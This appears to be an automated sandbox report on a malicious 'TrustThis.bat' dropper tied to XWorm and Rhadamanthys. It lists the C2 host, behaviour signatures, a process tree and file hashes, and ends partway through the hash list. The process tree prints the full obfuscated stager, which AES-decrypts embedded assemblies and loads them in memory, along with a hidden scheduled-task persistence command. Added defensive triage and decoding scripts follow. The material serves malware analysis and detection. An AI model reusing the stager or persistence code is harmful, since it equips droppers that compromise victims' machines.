Analysis

  • max time kernel
    132s
  • max time network
    133s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags
    arch:x64 arch:x86 image:win11-20250217-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    04/03/2025, 16:37

General

  • Target

    https://cdn.discordapp.com/attachments/1225566112306040944/1258428441439637635/TrustThis.bat?ex=67c85ed0&is=67c70d50&hm=20e94d244b8643fcd7ed0b5dc982c6192e9668f203a8bc64ec2d069947af5e1a&

Malware Config

Extracted

Family

xworm

C2

paris-itself.gl.at.ply.gg:49485

Attributes
  • Install_directory

    %Public%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Rhadamanthys family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell with a hidden display window (-w hidden).

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
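The extracted config (install path %Public%\USB.exe, C2 paris-itself.gl.at.ply.gg:49485) and the persistence chain visible in the process tree below (scheduled task Windows_Log_400_str running %AppData%\Windows_Log_400.vbs, which re-launches Windows_Log_400.bat) give enough host indicators for a triage script. The following is an added example written for this report, not part of the sandbox output; the script name, the $Remove switch and the object layout are the author's choices, and every indicator value is taken from this page.

```powershell
# Triage-XwormBat.ps1 (hypothetical name): read-only host check for the IoCs in this
# report; pass -Remove to tear the persistence chain down. Added example, not report content.
param([switch] $Remove)

$C2Host   = 'paris-itself.gl.at.ply.gg'   # ply.gg is a playit.gg tunnel, so the IP is a relay
$C2Port   = 49485
$TaskName = 'Windows_Log_400_str'
$Paths = @(
    (Join-Path $env:PUBLIC  'USB.exe'),             # Install_directory + install_file from the config
    (Join-Path $env:APPDATA 'Windows_Log_400.vbs'), # action of the logon task
    (Join-Path $env:APPDATA 'Windows_Log_400.bat')  # stager copy launched by the VBS
)
$hits = @()

# 1. Logon task registered by the Register-ScheduledTask call in the process tree.
$task = Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
if ($task) {
    $hits += [pscustomobject]@{ Type = 'ScheduledTask'; Value = $TaskName
                                Detail = (($task.Actions | ForEach-Object Execute) -join ';') }
}

# 2. Dropped files; hash them so the result can be compared with the sandbox run.
foreach ($p in $Paths) {
    if (Test-Path -LiteralPath $p) {
        $hits += [pscustomobject]@{ Type = 'File'; Value = $p
                                    Detail = (Get-FileHash -Algorithm SHA256 -LiteralPath $p).Hash }
    }
}

# 3. C2 contact: the tunnel hostname in the DNS cache, the tunnel port in the TCP table.
foreach ($d in (Get-DnsClientCache -ErrorAction SilentlyContinue | Where-Object Entry -like "*$C2Host*")) {
    $hits += [pscustomobject]@{ Type = 'DnsCache'; Value = $d.Entry; Detail = $d.Data }
}
foreach ($c in (Get-NetTCPConnection -RemotePort $C2Port -ErrorAction SilentlyContinue)) {
    $proc = Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue
    $hits += [pscustomobject]@{ Type = 'TcpConnection'; Value = "$($c.RemoteAddress):$($c.RemotePort)"
                                Detail = "PID $($c.OwningProcess) $($proc.ProcessName)" }
}

# 4. Live members of the chain: wscript.exe on the VBS, or powershell.exe started with
#    -w hidden (the echo ... | powershell -w hidden pattern). Skip this script's own process.
Get-CimInstance Win32_Process -Filter "Name='wscript.exe' OR Name='powershell.exe'" |
    Where-Object { $_.ProcessId -ne $PID -and $_.CommandLine -match 'Windows_Log_400|-w hidden' } |
    ForEach-Object {
        $hits += [pscustomobject]@{ Type = 'Process'; Value = "$($_.ProcessId) $($_.Name)"; Detail = $_.CommandLine }
    }

$hits | Format-Table -AutoSize -Wrap

if ($Remove -and $hits) {
    # Kill the running chain first so it cannot recreate the task or files during cleanup.
    $hits | Where-Object Type -eq 'Process' | ForEach-Object {
        Stop-Process -Id ([int](($_.Value -split ' ')[0])) -Force -ErrorAction SilentlyContinue
    }
    if ($task) { Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false }
    foreach ($p in $Paths) { Remove-Item -LiteralPath $p -Force -ErrorAction SilentlyContinue }
}
```

Run it elevated, since the task was registered with -RunLevel Highest and Get-NetTCPConnection needs the owning PID of other users' sockets. Treat a DNS-cache or TCP hit as a confirmed beacon attempt only together with a file or task hit: ply.gg relay addresses are shared across tunnels, so the hostname, not the resolved IP, is the indicator worth blocking.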

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    PID:2464
    • C:\Windows\system32\openwith.exe
      "C:\Windows\system32\openwith.exe"
      2⤵
      PID:3936
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    PID:3356
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1225566112306040944/1258428441439637635/TrustThis.bat?ex=67c85ed0&is=67c70d50&hm=20e94d244b8643fcd7ed0b5dc982c6192e9668f203a8bc64ec2d069947af5e1a&
      2⤵
      • Enumerates system info in registry
      • Modifies registry class
      • NTFS ADS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe64753cb8,0x7ffe64753cc8,0x7ffe64753cd8
        3⤵
        PID:968
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:2
        3⤵
        PID:2172
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1548
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:8
        3⤵
        PID:5060
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
        3⤵
        PID:1620
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
        3⤵
        PID:1732
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
        3⤵
        PID:3628
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
        3⤵
        PID:2916
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
        3⤵
        PID:2840
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
        3⤵
        PID:4568
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:1
        3⤵
        PID:2908
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 /prefetch:8
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:764
      • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6472 /prefetch:8
        3⤵
        PID:4776
      • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6472 /prefetch:8
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3804
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4900 /prefetch:8
        3⤵
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        PID:2120
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3408 /prefetch:2
        3⤵
        PID:3172
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
        3⤵
        PID:3608
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
        3⤵
        PID:1116
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,17102975606264871053,8888498770441473660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
        3⤵
        PID:4792
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TrustThis.bat" "
      2⤵
      PID:4580
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r8/Zl2ecne/3MZcG/uh0q3ioBEhiW/bhw3Tyinq/3G8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nm+LG7aKYHflmvAksVBR6Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ebMMw=New-Object System.IO.MemoryStream(,$param_var); $VCpwn=New-Object System.IO.MemoryStream; $YDZpb=New-Object System.IO.Compression.GZipStream($ebMMw, [IO.Compression.CompressionMode]::Decompress); $YDZpb.CopyTo($VCpwn); $YDZpb.Dispose(); $ebMMw.Dispose(); $VCpwn.Dispose(); $VCpwn.ToArray();}function execute_function($param_var,$param2_var){ $HuWNY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eBYtd=$HuWNY.EntryPoint; $eBYtd.Invoke($null, $param2_var);}$wLVWE = 'C:\Users\Admin\Downloads\TrustThis.bat';$host.UI.RawUI.WindowTitle = $wLVWE;$eihJj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wLVWE).Split([Environment]::NewLine);foreach ($nbHzB in $eihJj) { if ($nbHzB.StartsWith('MXAFqxvpoGvwnekBuzqK')) { $hSQxh=$nbHzB.Substring(20); break; }}$payloads_var=[string[]]$hSQxh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        3⤵
        PID:736
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2400
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_400_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_400.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3188
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_400.vbs"
          4⤵
          PID:3156
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_400.bat" "
            5⤵
            PID:4032
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r8/Zl2ecne/3MZcG/uh0q3ioBEhiW/bhw3Tyinq/3G8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nm+LG7aKYHflmvAksVBR6Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ebMMw=New-Object System.IO.MemoryStream(,$param_var); $VCpwn=New-Object System.IO.MemoryStream; $YDZpb=New-Object System.IO.Compression.GZipStream($ebMMw, [IO.Compression.CompressionMode]::Decompress); $YDZpb.CopyTo($VCpwn); $YDZpb.Dispose(); $ebMMw.Dispose(); $VCpwn.Dispose(); $VCpwn.ToArray();}function execute_function($param_var,$param2_var){ $HuWNY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eBYtd=$HuWNY.EntryPoint; $eBYtd.Invoke($null, $param2_var);}$wLVWE = 'C:\Users\Admin\AppData\Roaming\Windows_Log_400.bat';$host.UI.RawUI.WindowTitle = $wLVWE;$eihJj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wLVWE).Split([Environment]::NewLine);foreach ($nbHzB in $eihJj) { if ($nbHzB.StartsWith('MXAFqxvpoGvwnekBuzqK')) { $hSQxh=$nbHzB.Substring(20); break; }}$payloads_var=[string[]]$hSQxh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
              6⤵
              PID:2328
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3196
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:1484
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:2616
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:2760
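The cmd.exe /S /D /c "echo ... | powershell -w hidden" entries above contain the whole stager in clear text: it reads its own .bat file, takes the first line that starts with the 20-character marker MXAFqxvpoGvwnekBuzqK, splits the remainder on '\', reverses a Base64 alphabet substitution ('#' for '/', '@' for 'A'), Base64-decodes, AES-CBC/PKCS7-decrypts with the hard-coded key r8/Zl2ecne/3MZcG/uh0q3ioBEhiW/bhw3Tyinq/3G8= and IV nm+LG7aKYHflmvAksVBR6Q==, gunzips, and hands each result to Assembly.Load followed by EntryPoint.Invoke. The method names are hidden only by string reversal ('gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'daoL' is Load, 'txeTllAdaeR' is ReadAllText). Because key, IV and marker are all in the script, the embedded assemblies can be recovered statically. The script below is an added example written for this report, not the stager or any project code; it repeats the stager's transformations but writes the decoded bytes to disk instead of loading them. The script name, parameter names and output file names are the author's choices; the marker, key and IV are copied from the command line above.

```powershell
# Decode-BatStager.ps1 (hypothetical name): recover the assemblies embedded in a .bat
# that uses the TrustThis.bat / Windows_Log_400.bat stager format. Nothing is executed.
# Added example, not part of the sandbox report.
param(
    [Parameter(Mandatory)] [string] $BatPath,
    [string] $OutDir = (Join-Path (Get-Location) 'decoded')
)

# Values hard-coded in the stager's command line in this report.
$Marker = 'MXAFqxvpoGvwnekBuzqK'                       # 20-char prefix of the payload line
$KeyB64 = 'r8/Zl2ecne/3MZcG/uh0q3ioBEhiW/bhw3Tyinq/3G8='  # 32 bytes -> AES-256
$IvB64  = 'nm+LG7aKYHflmvAksVBR6Q=='                      # 16 bytes

function Invoke-AesCbcDecrypt([byte[]] $Data) {
    # Same primitive the stager uses: AES-CBC, PKCS7, static key and IV.
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = [Convert]::FromBase64String($KeyB64)
        $aes.IV      = [Convert]::FromBase64String($IvB64)
        $dec = $aes.CreateDecryptor()
        try { return ,$dec.TransformFinalBlock($Data, 0, $Data.Length) }
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-Gzip([byte[]] $Data) {
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    $bytes = $out.ToArray(); $out.Dispose()
    return ,$bytes
}

# The stager reads its own file and stops at the first line starting with the marker.
$line = Get-Content -LiteralPath $BatPath |
        Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
if (-not $line) { throw "No line starting with marker '$Marker' in $BatPath" }

New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
$i = 0
foreach ($chunk in $line.Substring($Marker.Length).Split('\')) {
    # Undo the alphabet substitution, then Base64 -> AES -> GZip, exactly as the stager does.
    $b64   = $chunk.Replace('#', '/').Replace('@', 'A')
    $plain = [byte[]](Expand-Gzip (Invoke-AesCbcDecrypt ([Convert]::FromBase64String($b64))))
    $file  = Join-Path $OutDir ("payload{0}.bin" -f $i)
    [IO.File]::WriteAllBytes($file, $plain)
    # Assembly.Load expects a PE image, so the plaintext should start with 'MZ'.
    $isPe = ($plain.Length -gt 2 -and $plain[0] -eq 0x4D -and $plain[1] -eq 0x5A)
    $sha  = (Get-FileHash -Algorithm SHA256 -LiteralPath $file).Hash
    "{0}: {1} bytes, PE={2}, SHA256={3}" -f $file, $plain.Length, $isPe, $sha
    $i++
}
```

payload0.bin and payload1.bin correspond to $payloads_var[0] and $payloads_var[1] in the stager (the second one is invoked with an empty string[] as Main's argument, the first with $null). Run this only in an isolated analysis VM and on a copy of the .bat: the output files are the same assemblies the sandbox loaded, so they should go straight to hashing and scanning rather than being opened. Windows_Log_400.bat in the tree uses the same marker, key and IV, so the same script applies to the persisted copy.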

Network

MITRE ATT&CK Enterprise v15

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      3KB

                                                      MD5

                                                      df472dcddb36aa24247f8c8d8a517bd7

                                                      SHA1

                                                      6f54967355e507294cbc86662a6fbeedac9d7030

                                                      SHA256

                                                      e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

                                                      SHA512

                                                      06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      615cd26b7a4871b97378112a103e3b0b

                                                      SHA1

                                                      4136381af22dda1fb7aebcd9bf3f7769305bd544

                                                      SHA256

                                                      662925803226ff2e7400ca3a20a44d4d98614845214fb9ed33c7373ee15b71e5

                                                      SHA512

                                                      b67b1d38dc0ef347dfde8f44e231a7e82f30bf216bf0f4a5f499b24aa2cc7a54249f06d49e725138aa637159b0d09de0c020a1e1bb236bd5f9d3d2d4d678824d

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      71bf6b3c57d5e4c25311c2b2e30a4f61

                                                      SHA1

                                                      f1616a7597c65b900bbbef18dd01239afbb44850

                                                      SHA256

                                                      872b79463d3855598f6b477cd11e7f8c01fa701bcaa273d3720f1670a69f9707

                                                      SHA512

                                                      254bef2252817ff67d43744cb0a7def5db7bb6d723b445d902745a8ab293658a911ad85ede79513838705bd30d9ac0dfa8b69f2863c3121892724226b9b08b48

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                      Filesize

                                                      186B

                                                      MD5

                                                      094ab275342c45551894b7940ae9ad0d

                                                      SHA1

                                                      2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

                                                      SHA256

                                                      ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

                                                      SHA512

                                                      19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                      Filesize

                                                      5KB

                                                      MD5

                                                      7ce290a579e818b14f543e08e07f5c9c

                                                      SHA1

                                                      9ae1f5490fa8a9538794f7b1f6572efdfff36aaa

                                                      SHA256

                                                      151458c11e90b908363ae09c4285d8e73be5c7fab3a56b623a1945a19a4c3bb9

                                                      SHA512

                                                      da038973bba7414c43a493e33ed7457d8973d411245a9931fa41396fac85a118c673b440150e48ed738624dd5b6b4807fd0dd723fe43ae8be50df81e07a77163

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                      Filesize

                                                      5KB

                                                      MD5

                                                      3ba801149139c36d7ea110cbad501d13

                                                      SHA1

